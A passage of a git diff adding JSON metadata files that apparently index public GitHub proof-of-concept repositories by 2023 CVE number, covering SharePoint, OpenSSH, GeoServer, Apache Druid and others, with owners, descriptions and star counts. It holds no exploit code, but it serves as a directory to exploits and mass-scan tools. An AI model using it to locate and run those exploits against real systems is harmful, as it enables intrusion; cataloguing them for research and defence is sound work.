0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-24955.json b/2023/CVE-2023-24955.json new file mode 100644 index 0000000000..fbf5806b88 --- /dev/null +++ b/2023/CVE-2023-24955.json @@ -0,0 +1,33 @@ +[ + { + "id": 736570933, + "name": "CVE-2023-24955-PoC", + "full_name": "former-farmer\/CVE-2023-24955-PoC", + "owner": { + "login": "former-farmer", + "id": 151993362, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/151993362?v=4", + "html_url": "https:\/\/github.com\/former-farmer", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/former-farmer\/CVE-2023-24955-PoC", + "description": "Exploit for Microsoft SharePoint 2019", + "fork": false, + "created_at": "2023-12-28T09:08:47Z", + "updated_at": "2024-12-17T07:21:02Z", + "pushed_at": "2023-12-28T10:02:02Z", + "stargazers_count": 14, + "watchers_count": 14, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 14, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-24998.json b/2023/CVE-2023-24998.json new file mode 100644 index 0000000000..f37c6fb920 --- /dev/null +++ b/2023/CVE-2023-24998.json @@ -0,0 +1,33 @@ +[ + { + "id": 620590502, + "name": "CVE-2023-24998", + "full_name": "nice1st\/CVE-2023-24998", + "owner": { + "login": "nice1st", + "id": 48778145, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48778145?v=4", + "html_url": "https:\/\/github.com\/nice1st", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nice1st\/CVE-2023-24998", + "description": "Apache Commons FileUpload 보안 취약점 테스트", + "fork": false, + "created_at": "2023-03-29T01:36:29Z", + "updated_at": "2024-05-19T00:57:16Z", + "pushed_at": "2023-03-29T04:56:04Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-25136.json b/2023/CVE-2023-25136.json new file mode 100644 index 0000000000..de6526e04d --- /dev/null +++ b/2023/CVE-2023-25136.json @@ -0,0 +1,287 @@ +[ + { + "id": 598673740, + "name": "jfrog-CVE-2023-25136-OpenSSH_Double-Free", + "full_name": "jfrog\/jfrog-CVE-2023-25136-OpenSSH_Double-Free", + "owner": { + "login": "jfrog", + "id": 499942, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/499942?v=4", + "html_url": "https:\/\/github.com\/jfrog", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jfrog\/jfrog-CVE-2023-25136-OpenSSH_Double-Free", + "description": null, + "fork": false, + "created_at": "2023-02-07T15:33:41Z", + "updated_at": "2024-08-12T20:29:42Z", + "pushed_at": "2023-02-09T09:06:15Z", + "stargazers_count": 43, + "watchers_count": 43, + "has_discussions": false, + "forks_count": 9, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 9, + "watchers": 43, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 601784074, + "name": "CVE-2023-25136", + "full_name": "ticofookfook\/CVE-2023-25136", + "owner": { + "login": "ticofookfook", + "id": 99700348, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/99700348?v=4", + "html_url": "https:\/\/github.com\/ticofookfook", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ticofookfook\/CVE-2023-25136", + "description": null, + "fork": false, + "created_at": "2023-02-14T20:13:16Z", + "updated_at": "2023-02-15T03:01:55Z", + "pushed_at": "2023-02-14T20:21:47Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 605262093, + "name": "CVE-2023-25136", + "full_name": "Christbowel\/CVE-2023-25136", + "owner": { + "login": "Christbowel", + "id": 96427513, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/96427513?v=4", + "html_url": "https:\/\/github.com\/Christbowel", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Christbowel\/CVE-2023-25136", + "description": "OpenSSH 9.1 vulnerability mass scan and exploit", + "fork": false, + "created_at": "2023-02-22T19:44:08Z", + "updated_at": "2024-12-09T01:45:01Z", + "pushed_at": "2023-03-07T10:43:36Z", + "stargazers_count": 103, + "watchers_count": 103, + "has_discussions": false, + "forks_count": 22, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 22, + "watchers": 103, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 629709771, + "name": "CVE-2023-25136", + "full_name": "adhikara13\/CVE-2023-25136", + "owner": { + "login": "adhikara13", + "id": 44716348, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44716348?v=4", + "html_url": "https:\/\/github.com\/adhikara13", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/adhikara13\/CVE-2023-25136", + "description": "OpenSSH Pre-Auth Double Free CVE-2023-25136 POC", + "fork": false, + "created_at": "2023-04-18T21:47:47Z", + "updated_at": "2024-03-27T19:12:22Z", + "pushed_at": "2023-04-21T14:22:41Z", + "stargazers_count": 45, + "watchers_count": 45, + "has_discussions": false, + "forks_count": 9, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 9, + "watchers": 45, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 634006271, + "name": "CVE-2023-25136", + "full_name": "nhakobyan685\/CVE-2023-25136", + "owner": { + "login": "nhakobyan685", + "id": 118097522, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/118097522?v=4", + "html_url": "https:\/\/github.com\/nhakobyan685", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nhakobyan685\/CVE-2023-25136", + "description": "OpenSSH 9.1 vulnerability mass scan and exploit", + "fork": false, + "created_at": "2023-04-28T19:46:03Z", + "updated_at": "2024-11-07T18:03:29Z", + "pushed_at": "2023-04-28T20:29:10Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 8, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 648990454, + "name": "CVE-2023-25136_POC", + "full_name": "axylisdead\/CVE-2023-25136_POC", + "owner": { + "login": "axylisdead", + "id": 135433130, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/135433130?v=4", + "html_url": "https:\/\/github.com\/axylisdead", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/axylisdead\/CVE-2023-25136_POC", + "description": "CVE-2023-25136 POC written by axylisdead", + "fork": false, + "created_at": "2023-06-03T12:36:42Z", + "updated_at": "2023-09-10T12:13:22Z", + "pushed_at": "2023-07-05T00:29:31Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "anus", + "openssh", + "poc", + "preauth-rce", + "yourmom" + ], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 660561885, + "name": "CVE-2023-25136", + "full_name": "H4K6\/CVE-2023-25136", + "owner": { + "login": "H4K6", + "id": 83515195, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/83515195?v=4", + "html_url": "https:\/\/github.com\/H4K6", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/H4K6\/CVE-2023-25136", + "description": "OpenSSH 9.1漏洞大规模扫描和利用", + "fork": false, + "created_at": "2023-06-30T09:34:36Z", + "updated_at": "2024-07-22T05:09:33Z", + "pushed_at": "2023-06-30T09:36:19Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 5, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 687169714, + "name": "CVE-2023-25136", + "full_name": "Business1sg00d\/CVE-2023-25136", + "owner": { + "login": "Business1sg00d", + "id": 112768445, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/112768445?v=4", + "html_url": "https:\/\/github.com\/Business1sg00d", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Business1sg00d\/CVE-2023-25136", + "description": "Looking into the memory when sshd 9.1p1 aborts due to a double free bug.", + "fork": false, + "created_at": "2023-09-04T19:28:43Z", + "updated_at": "2023-10-21T09:31:07Z", + "pushed_at": "2023-09-08T17:49:47Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 694642627, + "name": "CVE-2023-25136", + "full_name": "malvika-thakur\/CVE-2023-25136", + "owner": { + "login": "malvika-thakur", + "id": 60217652, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60217652?v=4", + "html_url": "https:\/\/github.com\/malvika-thakur", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/malvika-thakur\/CVE-2023-25136", + "description": "OpenSSH Pre-Auth Double Free CVE-2023-25136 – Writeup and Proof-of-Concept", + "fork": false, + "created_at": "2023-09-21T12:05:35Z", + "updated_at": "2024-02-21T16:24:14Z", + "pushed_at": "2023-09-21T12:35:55Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-25157.json b/2023/CVE-2023-25157.json new file mode 100644 index 0000000000..5a02f5f37b --- /dev/null +++ b/2023/CVE-2023-25157.json @@ -0,0 +1,205 @@ +[ + { + "id": 650178194, + "name": "CVE-2023-25157", + "full_name": "win3zz\/CVE-2023-25157", + "owner": { + "login": "win3zz", + "id": 12781459, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12781459?v=4", + "html_url": "https:\/\/github.com\/win3zz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/win3zz\/CVE-2023-25157", + "description": "CVE-2023-25157 - GeoServer SQL Injection - PoC", + "fork": false, + "created_at": "2023-06-06T14:05:09Z", + "updated_at": "2024-12-02T10:44:40Z", + "pushed_at": "2023-07-14T10:40:17Z", + "stargazers_count": 166, + "watchers_count": 166, + "has_discussions": false, + "forks_count": 35, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 35, + "watchers": 166, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 651841197, + "name": "CVE-2023-25157", + "full_name": "0x2458bughunt\/CVE-2023-25157", + "owner": { + "login": "0x2458bughunt", + "id": 134130770, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/134130770?v=4", + "html_url": "https:\/\/github.com\/0x2458bughunt", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0x2458bughunt\/CVE-2023-25157", + "description": null, + "fork": false, + "created_at": "2023-06-10T09:00:16Z", + "updated_at": "2023-09-27T05:13:54Z", + "pushed_at": "2023-06-10T10:41:08Z", + "stargazers_count": 12, + "watchers_count": 12, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 12, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 652314324, + "name": "CVE-2023-25157-and-CVE-2023-25158", + "full_name": "murataydemir\/CVE-2023-25157-and-CVE-2023-25158", + "owner": { + "login": "murataydemir", + "id": 16391655, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16391655?v=4", + "html_url": "https:\/\/github.com\/murataydemir", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/murataydemir\/CVE-2023-25157-and-CVE-2023-25158", + "description": "GeoServer & GeoTools SQL Injection (CVE-2023-25157 & CVE-2023-25158)", + "fork": false, + "created_at": "2023-06-11T18:57:18Z", + "updated_at": "2024-07-12T14:49:36Z", + "pushed_at": "2023-06-11T20:18:09Z", + "stargazers_count": 14, + "watchers_count": 14, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 14, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 652662180, + "name": "CVE-2023-25157-checker", + "full_name": "7imbitz\/CVE-2023-25157-checker", + "owner": { + "login": "7imbitz", + "id": 26263598, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26263598?v=4", + "html_url": "https:\/\/github.com\/7imbitz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/7imbitz\/CVE-2023-25157-checker", + "description": "A script, written in golang. POC for CVE-2023-25157", + "fork": false, + "created_at": "2023-06-12T14:34:14Z", + "updated_at": "2023-09-02T16:36:53Z", + "pushed_at": "2024-02-02T08:12:39Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 672729005, + "name": "CVE-2023-25157", + "full_name": "Rubikcuv5\/CVE-2023-25157", + "owner": { + "login": "Rubikcuv5", + "id": 47946047, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47946047?v=4", + "html_url": "https:\/\/github.com\/Rubikcuv5", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Rubikcuv5\/CVE-2023-25157", + "description": " GeoServer OGC Filter SQL Injection Vulnerabilities", + "fork": false, + "created_at": "2023-07-31T03:10:41Z", + "updated_at": "2023-07-31T19:38:13Z", + "pushed_at": "2023-07-31T22:44:42Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 724490342, + "name": "Geoserver-CVE-2023-25157", + "full_name": "dr-cable-tv\/Geoserver-CVE-2023-25157", + "owner": { + "login": "dr-cable-tv", + "id": 152005084, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/152005084?v=4", + "html_url": "https:\/\/github.com\/dr-cable-tv", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dr-cable-tv\/Geoserver-CVE-2023-25157", + "description": "Geoserver SQL Injection Exploit", + "fork": false, + "created_at": "2023-11-28T07:23:00Z", + "updated_at": "2024-09-10T16:06:20Z", + "pushed_at": "2023-11-28T10:07:24Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cql", + "cve-2023-25157", + "exploit", + "geoserver", + "geotools", + "posgresql", + "postgres", + "python", + "python3", + "rce", + "rce-exploit", + "sql", + "sqli", + "vulner", + "vulnerability-detection", + "vulnerability-scanners" + ], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-2516.json b/2023/CVE-2023-2516.json new file mode 100644 index 0000000000..5b15daefd0 --- /dev/null +++ b/2023/CVE-2023-2516.json @@ -0,0 +1,33 @@ +[ + { + "id": 644828521, + "name": "CVE-2023-2516", + "full_name": "mnqazi\/CVE-2023-2516", + "owner": { + "login": "mnqazi", + "id": 32686360, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32686360?v=4", + "html_url": "https:\/\/github.com\/mnqazi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mnqazi\/CVE-2023-2516", + "description": "Medium Blog", + "fork": false, + "created_at": "2023-05-24T10:44:52Z", + "updated_at": "2023-05-24T10:52:12Z", + "pushed_at": "2023-05-24T10:50:30Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-25194.json b/2023/CVE-2023-25194.json new file mode 100644 index 0000000000..1bb7fe24db --- /dev/null +++ b/2023/CVE-2023-25194.json @@ -0,0 +1,98 @@ +[ + { + "id": 599535214, + "name": "CVE-2023-25194", + "full_name": "ohnonoyesyes\/CVE-2023-25194", + "owner": { + "login": "ohnonoyesyes", + "id": 93457304, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/93457304?v=4", + "html_url": "https:\/\/github.com\/ohnonoyesyes", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ohnonoyesyes\/CVE-2023-25194", + "description": null, + "fork": false, + "created_at": "2023-02-09T10:49:46Z", + "updated_at": "2024-08-12T20:29:45Z", + "pushed_at": "2023-02-09T11:00:26Z", + "stargazers_count": 92, + "watchers_count": 92, + "has_discussions": false, + "forks_count": 29, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 29, + "watchers": 92, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 736497233, + "name": "CVE-2023-25194", + "full_name": "YongYe-Security\/CVE-2023-25194", + "owner": { + "login": "YongYe-Security", + "id": 90460865, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/90460865?v=4", + "html_url": "https:\/\/github.com\/YongYe-Security", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/YongYe-Security\/CVE-2023-25194", + "description": "CVE-2023-25194 Scan", + "fork": false, + "created_at": "2023-12-28T04:24:02Z", + "updated_at": "2023-12-29T09:06:55Z", + "pushed_at": "2023-12-28T04:33:45Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 787945502, + "name": "cve-2023-25194", + "full_name": "vulncheck-oss\/cve-2023-25194", + "owner": { + "login": "vulncheck-oss", + "id": 134310220, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/134310220?v=4", + "html_url": "https:\/\/github.com\/vulncheck-oss", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/vulncheck-oss\/cve-2023-25194", + "description": "A go-exploit for Apache Druid CVE-2023-25194", + "fork": false, + "created_at": "2024-04-17T13:36:34Z", + "updated_at": "2024-10-30T14:55:15Z", + "pushed_at": "2025-01-02T22:30:21Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2023-25194", + "go-exploit" + ], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-25202.json b/2023/CVE-2023-25202.json new file mode 100644 index 0000000000..a2366bdd0a --- /dev/null +++ b/2023/CVE-2023-25202.json @@ -0,0 +1,33 @@ +[ + { + "id": 758395533, + "name": "CVE-2023-25202", + "full_name": "Trackflaw\/CVE-2023-25202", + "owner": { + "login": "Trackflaw", + "id": 78696986, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78696986?v=4", + "html_url": "https:\/\/github.com\/Trackflaw", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Trackflaw\/CVE-2023-25202", + "description": "CVE-2023-25202: Insecure file upload mechanism", + "fork": false, + "created_at": "2024-02-16T08:22:48Z", + "updated_at": "2024-09-19T07:09:54Z", + "pushed_at": "2024-02-16T08:51:09Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-25203.json b/2023/CVE-2023-25203.json new file mode 100644 index 0000000000..8f6a1e90c6 --- /dev/null +++ b/2023/CVE-2023-25203.json @@ -0,0 +1,33 @@ +[ + { + "id": 758397806, + "name": "CVE-2023-25203", + "full_name": "Trackflaw\/CVE-2023-25203", + "owner": { + "login": "Trackflaw", + "id": 78696986, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78696986?v=4", + "html_url": "https:\/\/github.com\/Trackflaw", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Trackflaw\/CVE-2023-25203", + "description": "CVE-2023-25203: Application Vulnerable to SSRF (Server Side Request Forgery) Attacks", + "fork": false, + "created_at": "2024-02-16T08:29:25Z", + "updated_at": "2024-02-16T08:29:25Z", + "pushed_at": "2024-02-16T08:50:53Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-2523.json b/2023/CVE-2023-2523.json new file mode 100644 index 0000000000..db6c78c6b7 --- /dev/null +++ b/2023/CVE-2023-2523.json @@ -0,0 +1,64 @@ +[ + { + "id": 683376877, + "name": "cve-2023-2523-and-cve-2023-2648", + "full_name": "bingtangbanli\/cve-2023-2523-and-cve-2023-2648", + "owner": { + "login": "bingtangbanli", + "id": 77956516, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/77956516?v=4", + "html_url": "https:\/\/github.com\/bingtangbanli", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bingtangbanli\/cve-2023-2523-and-cve-2023-2648", + "description": "cve-2023-2523-and-cve-2023-2648", + "fork": false, + "created_at": "2023-08-26T11:23:58Z", + "updated_at": "2024-02-02T03:20:29Z", + "pushed_at": "2023-08-26T15:35:20Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 696169058, + "name": "CVE-2023-2523", + "full_name": "Any3ite\/CVE-2023-2523", + "owner": { + "login": "Any3ite", + "id": 20638313, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20638313?v=4", + "html_url": "https:\/\/github.com\/Any3ite", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Any3ite\/CVE-2023-2523", + "description": null, + "fork": false, + "created_at": "2023-09-25T08:21:06Z", + "updated_at": "2023-09-25T17:19:35Z", + "pushed_at": "2023-09-25T08:25:08Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-25234.json b/2023/CVE-2023-25234.json new file mode 100644 index 0000000000..1af8055cda --- /dev/null +++ b/2023/CVE-2023-25234.json @@ -0,0 +1,33 @@ +[ + { + "id": 626394483, + "name": "CVE-2023-25234_Tenda_AC6_stack_overflow", + "full_name": "FzBacon\/CVE-2023-25234_Tenda_AC6_stack_overflow", + "owner": { + "login": "FzBacon", + "id": 48304150, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48304150?v=4", + "html_url": "https:\/\/github.com\/FzBacon", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/FzBacon\/CVE-2023-25234_Tenda_AC6_stack_overflow", + "description": null, + "fork": false, + "created_at": "2023-04-11T11:36:48Z", + "updated_at": "2023-04-20T08:56:58Z", + "pushed_at": "2023-04-20T08:56:24Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-25260.json b/2023/CVE-2023-25260.json new file mode 100644 index 0000000000..941ea0c78c --- /dev/null +++ b/2023/CVE-2023-25260.json @@ -0,0 +1,33 @@ +[ + { + "id": 608529592, + "name": "CVE-2023-25260", + "full_name": "trustcves\/CVE-2023-25260", + "owner": { + "login": "trustcves", + "id": 119938735, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/119938735?v=4", + "html_url": "https:\/\/github.com\/trustcves", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/trustcves\/CVE-2023-25260", + "description": null, + "fork": false, + "created_at": "2023-03-02T07:53:09Z", + "updated_at": "2023-03-27T07:59:36Z", + "pushed_at": "2023-05-02T07:01:12Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-25261.json b/2023/CVE-2023-25261.json new file mode 100644 index 0000000000..3b7a601e94 --- /dev/null +++ b/2023/CVE-2023-25261.json @@ -0,0 +1,33 @@ +[ + { + "id": 608529740, + "name": "CVE-2023-25261", + "full_name": "trustcves\/CVE-2023-25261", + "owner": { + "login": "trustcves", + "id": 119938735, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/119938735?v=4", + "html_url": "https:\/\/github.com\/trustcves", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/trustcves\/CVE-2023-25261", + "description": null, + "fork": false, + "created_at": "2023-03-02T07:53:41Z", + "updated_at": "2023-03-27T07:55:18Z", + "pushed_at": "2023-05-02T07:01:36Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-25262.json b/2023/CVE-2023-25262.json new file mode 100644 index 0000000000..6a2d7fca77 --- /dev/null +++ b/2023/CVE-2023-25262.json @@ -0,0 +1,33 @@ +[ + { + "id": 608530088, + "name": "CVE-2023-25262", + "full_name": "trustcves\/CVE-2023-25262", + "owner": { + "login": "trustcves", + "id": 119938735, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/119938735?v=4", + "html_url": "https:\/\/github.com\/trustcves", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/trustcves\/CVE-2023-25262", + "description": null, + "fork": false, + "created_at": "2023-03-02T07:54:47Z", + "updated_at": "2023-03-27T07:59:48Z", + "pushed_at": "2023-05-02T07:02:10Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-25263.json b/2023/CVE-2023-25263.json new file mode 100644 index 0000000000..fcf11de2ff --- /dev/null +++ b/2023/CVE-2023-25263.json @@ -0,0 +1,33 @@ +[ + { + "id": 608530196, + "name": "CVE-2023-25263", + "full_name": "trustcves\/CVE-2023-25263", + "owner": { + "login": "trustcves", + "id": 119938735, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/119938735?v=4", + "html_url": "https:\/\/github.com\/trustcves", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/trustcves\/CVE-2023-25263", + "description": null, + "fork": false, + "created_at": "2023-03-02T07:55:08Z", + "updated_at": "2023-03-27T07:29:44Z", + "pushed_at": "2023-05-02T07:03:04Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-25292.json b/2023/CVE-2023-25292.json new file mode 100644 index 0000000000..0a7031368b --- /dev/null +++ b/2023/CVE-2023-25292.json @@ -0,0 +1,64 @@ +[ + { + "id": 632617123, + "name": "CVE-2023-25292", + "full_name": "brainkok\/CVE-2023-25292", + "owner": { + "login": "brainkok", + "id": 92050069, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/92050069?v=4", + "html_url": "https:\/\/github.com\/brainkok", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/brainkok\/CVE-2023-25292", + "description": "Reflected Cross Site Scripting (XSS) in Intermesh BV Group-Office version 6.6.145, allows attackers to gain escalated privileges and gain sensitive information via the GO_LANGUAGE cookie", + "fork": false, 